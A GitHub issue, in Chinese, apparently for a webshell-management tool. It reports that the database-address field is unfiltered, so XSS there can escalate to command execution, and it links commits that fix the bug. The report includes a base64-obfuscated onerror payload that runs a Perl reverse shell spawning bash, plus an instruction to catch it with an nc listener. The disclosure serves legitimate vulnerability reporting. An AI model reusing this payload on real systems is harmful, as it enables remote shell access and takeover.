Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
除了已知问题,这里还有一处输入点没有过滤,能够造成XSS并执行命令。
在主页添加一个shell,右键点击数据操作,进入数据库管理页面
在数据库地址处输入payload,这里的输入点没有过滤,直接执行
localhost<img src onerror="eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxMjcuMC4w LjEiOyRwPTEwMDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoU yxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKF NUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9iYXNoIC1pIik7fTtcJycsKGVycm9yLCBzdGRvdXQsIHN0ZGVycik9PnsKICAgIGFsZXJ 0KGBzdGRvdXQ6ICR7c3Rkb3V0fWApOwogIH0pOw==`,`base64`).toString())">
开启nc监听1002端口,即可接到反弹的shell
或者你只想弹个窗也行
self-xss也请修复一下 :D
The text was updated successfully, but these errors were encountered:
4b932e8
(Fix: Database) fix #151 (thx @miaochiahao)
2c6b8ba
感谢反馈, 已修复
Sorry, something went wrong.
Medicean
No branches or pull requests
除了已知问题,这里还有一处输入点没有过滤,能够造成XSS并执行命令。
在主页添加一个shell,右键点击数据操作,进入数据库管理页面
在数据库地址处输入payload,这里的输入点没有过滤,直接执行
开启nc监听1002端口,即可接到反弹的shell
或者你只想弹个窗也行
self-xss也请修复一下 :D
The text was updated successfully, but these errors were encountered: